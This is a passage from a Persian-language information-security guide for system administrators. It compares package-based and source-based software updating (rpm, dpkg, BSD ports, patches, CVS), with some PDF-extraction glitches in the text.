‫ﺟﺰﺀ ﻣﻬﻢ ﺩﻳﮕﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪ ،‬ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻧﺴﺨﻪﻫﺎﻱ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ ﺍﺳـﺖ ﻛـﻪ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ ﻧـﺼﺐ‬
‫ﺷﺪﻩﺍﻧﺪ‪ .‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﻏﺎﻟﺒﹰﺎ ‪ Registery‬ﺍﻳﻦ ﻫﺪﻑ ﺭﺍ ﺗﺄﻣﻴﻦ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺳﺎﺩﻩ ﺍﺳﺖ‪ .‬ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻳﻚ ﻳﺎ ﺩﻭ ﻓﺮﻣﺎﻥ ﺳﺎﺩﻩ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺟﺪﻳـﺪ ﺭﺍ‬
‫ﻧﺼﺐ ﻳﺎ ﻭﻗﺘﻲ ﻳﻚ ﻧﺴﺨﻪ ﺟﺪﻳﺪ ﻳﺎ ﺍﺻﻼﺡﺷﺪﻩ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻓﻌﻠﻲ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﺪ‪ .‬ﭼﻮﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺯ ﻗﺒـﻞ‬
‫ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺴﺘﺮ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺗﺮﺟﻤﻪ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﻻﺯﻡ ﻧﻴﺴﺖ ﺭﺍﻫﺒﺮ ﺑﺮﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﻪ ﻭﻗﺖ ﺻﺮﻑ ﻛﻨﺪ‪.‬‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﻌﻤﻮﻝ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧـﻪ ﻟﺰﻭﻣـﹰﺎ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ﺷـﻤﺎ ﺗﺮﺟﻤـﻪ‬
‫ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺘﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﻛﺮﺩﻥ ﺑﺎ ﻧﻮﻉ ﺧﺎﺻﻲ ﺍﺯ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﻻ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ ‪ -‬ﭼﻨﺎﻧﭽـﻪ ﺩﺭ‬
‫ﻏﻴﺮﻋﺎﺩﻱ ﺳﺎﺯﮔﺎﺭ ﻧﻤﺎﺋﻴﺪ‪ ،‬ﻳﺎ ﺍﮔﺮ ﺗﻨﻬﺎ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺎ ﻳﻚ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺩﻟﺨـﻮﺍﻩ ﺍﺟـﺮﺍ ﻛﻨﻴـﺪ‪ ،‬ﺍﺣﺘﻤـﺎ ﹰ‬
‫ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ ‪ -‬ﺑﻴﺸﺘﺮ ﺑﻪ ﻛﺎﺭ ﺷﻤﺎ ﻣﻲﺁﻳﺪ‪ .‬ﻫﺴﺘﺔ ﺍﺻﻠﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪ Unix‬ﻧﻤﻮﻧﺔ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺍﺭﺍﺋﻪ ﻧﻤﻲﻛﻨﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺵ ﻣﺪﻳﺮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﻨﺎﺳـﺒﺘﺮ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ‬
‫ﺩﻳﮕﺮ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ‪ Solarix 2.x‬ﻓﺮﺍﻣﻴﻦ ‪) showren ،pkginfo ،pkgrm ،pkgadd‬ﻭ ﺳـﺎﻳﺮ ﻓـﺮﺍﻣﻴﻦ ﻣـﺸﺎﺑﻪ( ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺍﺿﺎﻓﻪ‪ ،‬ﺣﺬﻑ‪ ،‬ﻭ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﻭﺿﻌﻴﺖ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺯ ﭘﻮﺳﺘﻪ‪ ،‬ﻭ ﻓﺮﻣﺎﻥ ‪ admintool‬ﺭﺍ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺩﺭ ﻳـﻚ ﻣﺤـﻴﻂ‬
‫ﮔﺮﺍﻓﻴﻜﻲ ﻓﺮﺍﻫﻢ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪ .‬ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ‪ WindowsUpdate‬ﺑـﺮﺍﻱ ‪ download‬ﻭ ﻧـﺼﺐ ﻣـﻮﺍﺭﺩ‬
‫ﺍﺻﻼﺣﺎﺕ ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺗﺴﻬﻴﻼﺕ ﻣﺮﻛﺰﻱ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪108 Metadata‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٣٠١‬‬
‫ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺗﻨﻬﺎ ﻣﺨﺼﻮﺹ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻧﻴﺴﺖ‪ .‬ﺗﻮﺯﻳﻌﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Unix‬ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺁﺯﺍﺩ ﻧﻴـﺰ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ ﺳﺎﺩﻩﺗﺮ ﻛﻨﻨﺪ‪ .‬ﭼﻨـﺪﻳﻦ ﺗﻮﺯﻳـﻊ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪ ،Linux‬ﺳﻴـﺴﺘﻢ‬
‫ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ‪ ١٠٩RPM‬ﺭﺍ ﺑﺮﮔﺰﻳﺪﻩﺍﻧﺪ‪ .‬ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺍﺯ ﻳﻚ ﻓﺮﻣﺎﻥ ‪ rpm‬ﺑﺮﺍﻱ ﺗﻤﺎﻡ ﻛﺎﺭﻫﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺧﻮﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ Debian GNU/Linux .‬ﺍﺯ ﻳﻚ ﺳﻴـﺴﺘﻢ ﻣـﺪﻳﺮﻳﺖ ﺑـﺴﺘﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺟـﺎﻳﮕﺰﻳﻦ ﺑﻨـﺎﻡ ‪ dpkg‬ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻣﺒﺘﻨﻲ ﺑﺮ ‪ BSD‬ﺭﻭﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ‪ ١١٠‬ﺗﻤﺮﻛﺰ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣـﺎﻝ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺑـﺴﺘﻪﻫـﺎﻱ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺯ ﭘﻴﺶ ﺗﺮﺟﻤﻪﺷﺪﻩ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻓﺮﺍﻣﻴﻦ ‪ ،pkg_delete ،pkg_add‬ﻭ ‪ pkg_info‬ﺍﺩﺍﺭﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺳﻴﺴﺘﻢﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ‬
‫ﻻ ﺑﺮ ﻛﻤﻚ ﺑﻪ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﻳـﻚ‬
‫ﺑﺮﺧﻼﻑ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﻣﻌﻤﻮ ﹰ‬
‫ﻧﺴﺨﺔ ﺑﻪﺭﻭﺯ ﺷﺪﺓ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻳﺎ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ﺗﺄﻛﻴﺪ ﺩﺍﺭﻧﺪ‪ ،‬ﻛﻪ ﺩﺭ ﺁﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺟﺪﻳﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺮﺟﻤـﻪ ﻭ ﻧـﺼﺐ‬
‫ﺷﻮﻧﺪ‪.‬‬
‫ﺳﻴﺴﺘﻢ ﻣﺪﻳﺮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﺍﺯ ﭼﻨﺪ ﻣﻨﻈﺮ ﺑﺮ ﺳﻴﺴﺘﻢ ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺗﺮﺟﻴﺢ ﺩﺍﺭﺩ‪ :‬ﻳﻚ ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣـﺘﻦ ﺗﻨﻬـﺎ ﺩﺭ‬
‫ﻳﻚ ﻧﺴﺨﻪ ﻭﺍﺣﺪ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﺩﺭ ﻣﻘﺎﺑ ﹺ‬
‫ﻞ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺗﺮﺟﻤﻪ ﺷﺪﻩ ﻛﻪ ﺑﺎﻳﺪ ﺑﻄﻮﺭ ﻣﺠﺰﺍ ﺑﺮﺍﻱ ﻫﺮ ﻣﻌﻤﺎﺭﻱ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‬
‫ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﺗﺮﺟﻤﻪ ﻭ ﺑﺴﺘﻪﺑﻨﺪﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺷﻮﻧﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻻﺯﻡ ﺷﻮﺩ ﺗﻐﻴﻴﺮﺍﺕ ﻣﺤﻠﻲ ﺩﺭ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ‬
‫ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ ﺗﻨﻬﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﺍﺯ ﻧﻘﻄﻪﻧﻈﺮ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺳﺎﺧﺖ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺯ ﺭﻭﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻧﻲ ﮔﻴﺞﻛﻨﻨﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺍﺯ ﻳـﻚ ﻃـﺮﻑ ﺷـﻤﺎ ﺁﺯﺍﺩ‬
‫ﻫﺴﺘﻴﺪ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﺮﺩﻩ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻫﻴﭽﮕﻮﻧﻪ ﺍﺷﻜﺎﻝ ﭘﻨﻬﺎﻥ ﻳﺎ ﺍﺳﺐ ﺗﺮﺍﻭﺍ ﺩﺭ ﺁﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﺩﺭ ﻋﻤﻞ ﺍﻧﺠﺎﻡ ﺍﻳﻦ‬
‫ﺑﺮﺭﺳﻲ ﺩﺷﻮﺍﺭ ﺍﺳﺖ ﻭ ﺑﻨﺪﺭﺕ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ؛ ﻭ ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﺷـﻤﺎ ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛﻨـﺪ‪،‬‬
‫ﺑﺮﺍﻳﺶ ﻣﺸﻜﻞ ﭼﻨﺪﺍﻧﻲ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺳﺐ ﺗﺮﺍﻭﺍﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﻥ ﺍﺿﺎﻓﻪ ﻛﻨﺪ! ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺎﻳـﺪ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻫﻢ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺗﺮﺟﻤﻪ ﻣﻲﻛﻨﻴﺪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ‪ ،‬ﻭ ﻫﻢ ﺍﻳﻨﮑﻪ ﻳﻚ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﺔ‬
‫ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ‪.‬‬
‫ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﻭﺻﻠﻪﻫﺎ‬
‫ﺑﺮﺍﻱ ﻣﺜﺎﻝ ‪ Free BSD‬ﻭ ﻧﺴﺨﻪﻫﺎﻱ ‪ Unix‬ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻓﺮﺍﻭﺍﻧـﻲ ﺭﺍ ﺩﺭ ﻣﺠﻤﻮﻋـﻪ ‪port‬ﻫـﺎﻱ ﺧـﻮﺩ ﻣﻨﺘـﺸﺮ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ﺍﺯ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﻭ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﺻﻼﺡﻫﺎﻳﻲ ﻛﻪ ﺍﻋﻤﺎﻝ ﺷﺪﻩﺍﻧﺪ ﺗﺎ ﻳﻜﭙﺎﺭﭼﻪﺳﺎﺯﻱ ﺑﺮﻧﺎﻣﻪ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺩﺭ ﻣﺤﻴﻂ ‪ BSD‬ﺑﻬﺒﻮﺩ ﺑﺨﺸﻨﺪ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ‪ .‬ﻓﺎﻳﻠﻬﺎﻱ ﻗﺎﺑﻞ ﺗﺮﺟﻤﻪ‪ ،‬ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﻣﻲﺳـﺎﺯﻧﺪ‪ ،‬ﺁﻧـﺮﺍ‬
‫ﻧﺼﺐ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺳﭙﺲ ﻓﺎﻳﻠﻬﺎﻱ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑﺎ ﻓﺮﻣﺎﻥ ‪ BSD‬ﻣﺮﺑﻮﻃﻪ )‪ (pkg_odd‬ﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪FreeBSD‬‬
‫ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﻪ ﻣﻴﺰﺍﻥ ﻭﺳﻴﻌﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪109 RPM Package Management‬‬
‫‪110 Source-Based Updates‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺳﺎﺩﻩﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺩﺭ ﺳﻴﺴﺘﻢ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﻢ ﻭ ﻫﺮﮔـﺎﻩ ﻛـﻪ‬
‫ﻻ ﺑﻪ ﺷـﻜﻞ ﻳـﻚ ‪patch‬‬
‫ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﺪ ﺁﻧﺮﺍ ﻣﺠﺪﺩﹰﺍ ﺗﺮﺟﻤﻪ ﻧﻤﺎﻳﻴﻢ‪ .‬ﻭﻗﺘﻲ ﻳﻚ ﺍﺻﻼﺡ ﺑﺮﺍﻱ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﺩ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫‪ diff‬ﺍﺳﺖ؛ ﻓﺎﻳﻠﻲ ﻛﻪ ﺷﺮﺡ ﻣﻲﺩﻫﺪ ﻛﺪﺍﻣﻴﻚ ﺍﺯ ﺧﻄﻮﻁ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﻧﺴﺨﻪ ﻗﺪﻳﻤﻲ ﺑﺎﻳﺪ ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ‪ ،‬ﭘﺎﻙ ﺷﻮﻧﺪ‪ ،‬ﻳﺎ ﺑﻪ ﺁﻥ ﺍﻓﺰﻭﺩﻩ ﺷﻮﻧﺪ ﺗﺎ ﺑﻪ‬
‫ﺗﻮﻟﻴﺪ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﻣﻨﺠﺮ ﺷﻮﺩ‪ .‬ﺑﺮﻧﺎﻣﻪ ‪ diff‬ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻼﺣﻲ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺁﻧﻬﺎ ﺑﻪ ﻧﺴﺨﻪ ﻗﺪﻳﻤﻲ ﺍﺳﺖ ﺗـﺎ ﺑـﺎ‬
‫ﺍﻧﺠﺎﻡ ﺷﺪﻥ ﻋﻤﻞ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ‪ ،‬ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺍﻳﺠﺎﺩ ﺷﻮﺩ‪ .‬ﺑﻌﺪ ﺍﺯ ﺍﺻﻼﺡ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺗﺮﺟﻤﻪ ﻛﺮﺩﻩ ﻭ ﺁﻧﺮﺍ‬
‫ﻣﺠﺪﺩﹰﺍ ﻧﺼﺐ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫‪٣٠٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪CVS‬‬
‫‪١١١‬‬
‫ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻦ‪ ،‬ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﮐﻨﺘﺮﻝ ﻧﺴﺨﻪ ﻣـﺘﻦ‬
‫ﺑﺮﻧﺎﻣﻪ ﻣﺜﻞ ﺳﻴﺴﺘﻢ ﻧﺴﺨﻪﻫﺎﻱ ﻫﻤﺰﻣﺎﻥ )‪ ١١٢،(CVS‬ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﺍﺟﺎﺯﻩ ﺩﺍﺩﻥ ﺑﻪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺗﺼﺎﻻﺕ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ‬
‫ﻧﺎﺷﻨﺎﺱ ﺍﺳﺖ‪ .‬ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺧﻮﺩ ﺭﺍ ﺗﺎ ﺁﺧﺮﻳﻦ ﺑﺮﻭﻧﺪﺍﺩ ﺑﻪﺭﻭﺯ ﻛﻨﻨﺪ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﻧﻬﺎﻳﻲ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﺍﺻﻼﺡﺷـﺪﻩ‬
‫ﺍﺯ ﺑﺮﻧﺎﻣﻪ ‪ CVS‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻣﺘﻦ ﺑﻪﺭﻭﺯ ﺩﺭﺁﻣﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺮﺟﻤﻪ ﻭ ﻧﺼﺐ ﺷﻮﺩ‪.‬‬
‫‪ ،NetBSD ،FreeBSD‬ﻭ ‪ OpenBSD‬ﺑﺮﺍﻱ ﺍﻧﺘﺸﺎﺭ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺮﻛﺰﻱ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ ﺧـﻮﺩ ﺍﺯ ‪ CVS‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺎﺯ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ CVS‬ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛﻨﻨـﺪ ﻳـﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻳﻲ‬
